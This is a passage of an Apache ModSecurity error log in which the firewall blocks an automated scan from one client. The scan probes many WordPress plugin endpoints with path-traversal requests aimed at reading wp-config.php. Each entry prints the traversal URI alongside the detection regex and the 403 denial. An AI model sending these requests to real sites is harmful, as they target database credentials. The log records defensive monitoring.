"OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/rb-agency/ext/forcedownload.php"] [unique_id "ZEeekd-GjcOLRjW9Sa4WDQAAAJM"] [Tue Apr 25 04:34:09.578286 2023] [:error] [pid 15580:tid 140446990800640] [client 37.120.213.169:41538] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/recent-backups/download-file.php"] [unique_id "ZEeekd-GjcOLRjW9Sa4WDgAAAJQ"] [Tue Apr 25 04:34:09.704079 2023] [:error] [pid 15580:tid 140446982407936] [client 37.120.213.169:41540] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/relocate-upload/relocate-upload.php?ru_folder=asdf&abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/relocate-upload/relocate-upload.php"] [unique_id "ZEeekd-GjcOLRjW9Sa4WDwAAAJU"] [Tue Apr 25 04:34:09.829067 2023] [:error] [pid 15580:tid 140447186380544] [client 37.120.213.169:41544] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/robotcpa/f.php?l=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/robotcpa/f.php"] [unique_id "ZEeekd-GjcOLRjW9Sa4WEAAAAIU"] [Tue Apr 25 04:34:09.954868 2023] [:error] [pid 15580:tid 140447099905792] [client 37.120.213.169:41546] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php?name=wp-config.php&path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "ZEeekd-GjcOLRjW9Sa4WEQAAAIc"] [Tue Apr 25 04:34:10.080308 2023] [:error] [pid 15580:tid 140447041156864] [client 37.120.213.169:41548] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/se-html5-album-audio-player/download_audio.php"] [unique_id "ZEeekt-GjcOLRjW9Sa4WEgAAAI4"] [Tue Apr 25 04:34:10.205811 2023] [:error] [pid 15580:tid 140447211558656] [client 37.120.213.169:41550] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "ZEeekt-GjcOLRjW9Sa4WEwAAAII"] [Tue Apr 25 04:34:10.331921 2023] [:error] [pid 15580:tid 140447083120384] [client 37.120.213.169:41552] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sf-booking/lib/downloads.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sf-booking/lib/downloads.php"] [unique_id "ZEeekt-GjcOLRjW9Sa4WFAAAAIk"] [Tue Apr 25 04:34:10.464661 2023] [:error] [pid 15580:tid 140447108298496] [client 37.120.213.169:41554] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "ZEeekt-GjcOLRjW9Sa4WFQAAAIY"] [Tue Apr 25 04:34:10.592103 2023] [:error] [pid 15580:tid 140447066334976] [client 37.120.213.169:41558] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "ZEeekt-GjcOLRjW9Sa4WFwAAAIs"] [Tue Apr 25 04:34:10.718274 2023] [:error] [pid 15889:tid 140447007586048] [client 37.120.213.169:41560] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "ZEeekl4G6tVEc6w5Us7ghgAAANI"] [Tue Apr 25 04:34:10.844502 2023] [:error] [pid 15578:tid 140447066334976] [client 37.120.213.169:41562] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "ZEeekj754oNYNW-15_AYcAAAAAs"] [Tue Apr 25 04:34:10.970456 2023] [:error] [pid 15580:tid 140447228344064] [client 37.120.213.169:41564] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-import/admin/page.php"] [unique_id "ZEeekt-GjcOLRjW9Sa4WGAAAAIA"] [Tue Apr 25 04:34:11.118615 2023] [:error] [pid 15889:tid 140447194773248] [client 37.120.213.169:41566] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZEeek14G6tVEc6w5Us7ghwAAAMQ"] [Tue Apr 25 04:34:11.244814 2023] [:error] [pid 15889:tid 140446982407936] [client 37.120.213.169:41568] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php"] [unique_id "ZEeek14G6tVEc6w5Us7giAAAANU"] [Tue Apr 25 04:34:11.371509 2023] [:error] [pid 15578:tid 140447099905792] [client 37.120.213.169:41570] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/treemap.php"] [unique_id "ZEeekz754oNYNW-15_AYcQAAAAc"] [Tue Apr 25 04:34:11.498130 2023] [:error] [pid 15578:tid 140447219951360] [client 37.120.213.169:41572] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/zoomabletreemap.php"] [unique_id "ZEeekz754oNYNW-15_AYcgAAAAE"] [Tue Apr 25 04:34:11.633313 2023] [:error] [pid 15578:tid 140447211558656] [client 37.120.213.169:41574] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php"] [unique_id "ZEeekz754oNYNW-15_AYcwAAAAI"] [Tue Apr 25 04:34:11.760901 2023] [:error] [pid 15578:tid 140447228344064] [client 37.120.213.169:41576] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thinkun-remind/exportData.php?dirPath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thinkun-remind/exportData.php"] [unique_id "ZEeekz754oNYNW-15_AYdAAAAAA"] [Tue Apr 25 04:34:11.886402 2023] [:error] [pid 15578:tid 140447091513088] [client 37.120.213.169:41578] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "ZEeekz754oNYNW-15_AYdQAAAAg"] [Tue Apr 25 04:34:12.012411 2023] [:error] [pid 15578:tid 140447032764160] [client 37.120.213.169:41580] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source_vuln.php"] [unique_id "ZEeelD754oNYNW-15_AYdgAAAA8"] [Tue Apr 25 04:34:12.137739 2023] [:error] [pid 15578:tid 140447049549568] [client 37.120.213.169:41582] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php"] [unique_id "ZEeelD754oNYNW-15_AYdwAAAA0"] [Tue Apr 25 04:34:12.274270 2023] [:error] [pid 15578:tid 140446982407936] [client 37.120.213.169:41584] [client 37.120.213.169] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] 